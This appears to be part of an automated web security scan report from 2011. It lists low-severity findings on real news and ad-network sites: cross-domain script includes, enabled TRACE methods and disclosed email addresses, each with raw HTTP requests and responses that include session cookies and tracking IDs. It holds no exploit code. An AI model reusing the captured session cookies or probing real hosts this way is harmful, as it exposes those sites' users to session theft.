Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1303674274.1305051777.2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:58 GMT
Server: Apache
X-GasHost: gas2
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 320
Last-Modified: Thu, 12 May 2011 13:24:07 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 99836


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_cyT43nnmGBLrcjJe5U_E9DFbmhuzMJ9Y7DrGQ7aR-5yHczjRlVFXGvL60CPcBw2T"></script>
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js?" ></script>
...[SNIP]...
</div>
   <script type="text/javascript" src="http://zapp4.staticworld.net/js/adlinks.js"></script>
...[SNIP]...
14.43. http://www.pcworld.com/blogs/id,61/bizfeed.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,61/bizfeed.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/id,61/bizfeed.html HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=4B6B29B8D479FC267B6FA0BE40EC2DFC; fsr.a=1305207003266; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dpcwmw-pcworld%253D%252526pid%25253Dnews%2525253Alaptops%2525253Ablog%25252520article%2525253Achrome%25252520os%25252520will%25252520likely%25252520include%25252520netflix%25252520support%2525253A227430%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.pcworld.com/blogs/id%2525252C61/bizfeed.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:40 GMT
Server: Apache
X-GasHost: gas1
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 88
Last-Modified: Thu, 12 May 2011 13:07:45 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 104595


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_cyT43nnmGBLrcjJe5U_E9DFbmhuzMJ9Y7DrGQ7aR-5yHczjRlVFXGvL60CPcBw2T"></script>
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div>
   <script type="text/javascript" src="http://zapp4.staticworld.net/js/adlinks.js"></script>
...[SNIP]...
14.44. http://www.stumbleupon.com/badge/embed/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /badge/embed/1/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /badge/embed/1/?url=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:30:40 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 1303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110511" type="text/css" media="screen, projection" />
       
                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110511"></script>
...[SNIP]...
14.45. http://www.stumbleupon.com/badge/embed/5/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /badge/embed/5/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /badge/embed/5/?url=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:29:14 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 1305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110511" type="text/css" media="screen, projection" />
       
                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110511"></script>
...[SNIP]...
14.46. http://www.youtube.com/embed/TVqe8ieqz10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/TVqe8ieqz10

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /embed/TVqe8ieqz10?rel=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=s1z-YuDnG-Y; PREF=fv=10.2.154

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:28 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: GEO=c0df1fc5fad584dccc67bc540e26ae88cwsAAAAzVVOtwdbzTcvguA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 11186
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Introducing the Chromebook</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflZITYGO.css">


</head>
<body>
<d
...[SNIP]...
</div>


<script src="//s.ytimg.com/yt/jsbin/www-embed-vflgZmdiU.js"></script>
...[SNIP]...
14.47. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:53 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:27:53 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 108541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<link rel="image_src" href="http://i.zdnet.com/gallery/413190-130-92.jpg" />

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
OkwAAF-l@TMAAAA0&amp;t=2011.05.12.13.27.53&event=58/;ord=2011.05.12.13.27.53?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N815.zdnet.com/B5351017.3;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&amp;sg=505129&amp;o=6037%253A13616%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=13616&amp;pid=&amp;cid=207595&amp;pp=100&amp;e=&amp;rqid=01c17-ad-e3:4DCB701D5966F4&amp;orh=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=&amp;cpnmodule=&amp;count=&amp;ra=173.193.214.243&amp;pg=KAhF2QoPOkwAAF-l@TMAAAA0&amp;t=2011.05.12.13.27.53&event=58/;ord=2011.05.12.13.27.53?">
</SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.admeld.com/meld120.js"></script>
...[SNIP]...
<!-- BH Tracking -->
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-zdnet.js"></script>
...[SNIP]...
<!-- Apex -->
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Aud/javascript/apex.js"></script>
...[SNIP]...
<!-- /Apex -->
<script type="text/javascript" src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=103"></script>
...[SNIP]...
14.48. http://z-ecx.images-amazon.com/images/G/01/pda/ifc._V195103274_.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://z-ecx.images-amazon.com
Path:   /images/G/01/pda/ifc._V195103274_.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/G/01/pda/ifc._V195103274_.js HTTP/1.1
Host: z-ecx.images-amazon.com
Proxy-Connection: keep-alive
Referer: http://cdn-bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Server
Last-Modified: Sat, 06 Nov 2010 06:33:35 GMT
Content-Type: application/x-javascript
X-Cache-Lookup: HIT from cdn-images.amazon.com:8080
X-Cache-Lookup: MISS from cdn-images.amazon.com:10080
Vary: Accept-Encoding
Cache-Control: max-age=620909404
Date: Thu, 12 May 2011 13:31:15 GMT
Connection: close
Content-Length: 1720

var adserver_url;
function checkRequiredValues() {
   if(typeof base_url == "undefined" || typeof slot == "undefined"){
       punt();
   }
   
}

function createIframe(test) {
   var randomValue = '';
   if(test)
...[SNIP]...
"width", "100%");
   }
   
   // This can be the first child in the body as we assumed we are being
   // invoked in an iframe.
   document.body.insertBefore(iframe, null);
}

function punt() {
   document.write('<script src="http://bpx.a9.com/amzn/defaultad.js"></script>
...[SNIP]...
15. TRACE method is enabled  previous  next
There are 11 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

15.1. http://admeld-match.dotomi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /

Request

TRACE / HTTP/1.0
Host: admeld-match.dotomi.com
Cookie: c0b318bc6640733

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:35 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: admeld-match.dotomi.com
Cookie: c0b318bc6640733

15.2. http://cache.alluremedia.com.au/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.alluremedia.com.au
Path:   /

Request

TRACE / HTTP/1.0
Host: cache.alluremedia.com.au
Cookie: 76d29b93559a1ca7

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:40 GMT
Server: Apache/2.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: cache.alluremedia.com.au
Cookie: 76d29b93559a1ca7

15.3. http://dw.com.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.com.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dw.com.com
Cookie: b2599879e1174dbc

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:16 GMT
Server: Apache/2.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dw.com.com
Cookie: b2599879e1174dbc
Connection: Keep-Alive
X-CNET-Forwarded-For: 173.193.214.243

15.4. http://dw.zdnet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.zdnet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dw.zdnet.com
Cookie: fd0e1c6725e3dee0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:24 GMT
Server: Apache/2.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dw.zdnet.com
Cookie: fd0e1c6725e3dee0
Connection: Keep-Alive
X-CNET-Forwarded-For: 173.193.214.243

15.5. http://ping.crowdscience.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ping.crowdscience.com
Cookie: 8e6f26c2458c6ba6

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Content-Type: message/http
Date: Thu, 12 May 2011 13:28:57 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-Proto: http
Host: ping.crowdscience.com
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 8e6f26c2458c6ba6
Connection: Keep-Alive

15.6. http://routenote.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://routenote.com
Path:   /

Request

TRACE / HTTP/1.0
Host: routenote.com
Cookie: c5fee8878cdb5707

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:50 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: routenote.com
Cookie: c5fee8878cdb5707

15.7. http://tags.bluekai.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: 37a08b9285cdaa45

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:28:45 GMT
Content-Type: message/http
Connection: close

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: 37a08b9285cdaa45
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200

15.8. http://tenzing.fmpub.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tenzing.fmpub.net
Path:   /

Request

TRACE / HTTP/1.0
Host: tenzing.fmpub.net
Cookie: 83b4ced8839c3922

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:30:25 GMT
Server: Apache/2.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tenzing.fmpub.net
Cookie: 83b4ced8839c3922

15.9. http://www.gizmodo.com.au/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gizmodo.com.au
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gizmodo.com.au
Cookie: 98278f7814486ba2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:26 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gizmodo.com.au
Cookie: 98278f7814486ba2

15.10. http://www.pcworld.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pcworld.com
Cookie: d44224063149225a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:59 GMT
Server: Apache
Content-Type: message/http
Vary: Accept-Encoding
Connection: close

TRACE /gasoline.php?www.pcworld.com@/@ HTTP/1.1
Host: gas1.pcworld.com
Cookie: d44224063149225a
X-Forwarded-For: 173.193.214.243, 192.168.10.200
X-Forwarded-Host: www.pcworld.com
X-Forwarded-Server: www.pcworld.com
Connection: Keep-Alive

15.11. http://www.stumbleupon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: 483b461d4d7e943b

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 178
Date: Thu, 12 May 2011 13:29:33 GMT
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: 483b461d4d7e943b
X-Forwarded-For: 173.193.214.243
host: www.stumbleupon.com
X-Pool-Chosen: default
X-Varnish: 1719981124
Connection: keep-alive

16. Email addresses disclosed  previous  next
There are 19 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

16.1. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/behavioral-data/8201?d=24 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYIZ2ATTRk7wVYjdb0%2Fnf5PHiDFYPHG7B235RpLHgAs3GxOKSFLQqHHEwCsAFMRRPBcxjKXsNq9ZD3s3DY1YmlVKYhVcOoOTQyGLKSMEzm%2Fhy1PoubROv02DwpU8M9QcTneE53MnpqspWr70VR7tRN%2FqHiRi1vOfeknjflCpfX6W9Q%2FtPDpjwLtIELv1YaJg%2BPcTh7Tq9V%2B7FB45pFYFk6h4TQEsWOmVDwT1ZXOcLpoGchC8%2BnFErGMroprw0puXfB1vgF095J6SqH0HwktuxyES5Dxtf1yi0O6gD7y3l58byfxxBeostIiIEE1JWUraHxx8Hn8wU%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.2. http://ads.adbrite.com/adserver/behavioral-data/8203  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8203

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/behavioral-data/8203?d=2829 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
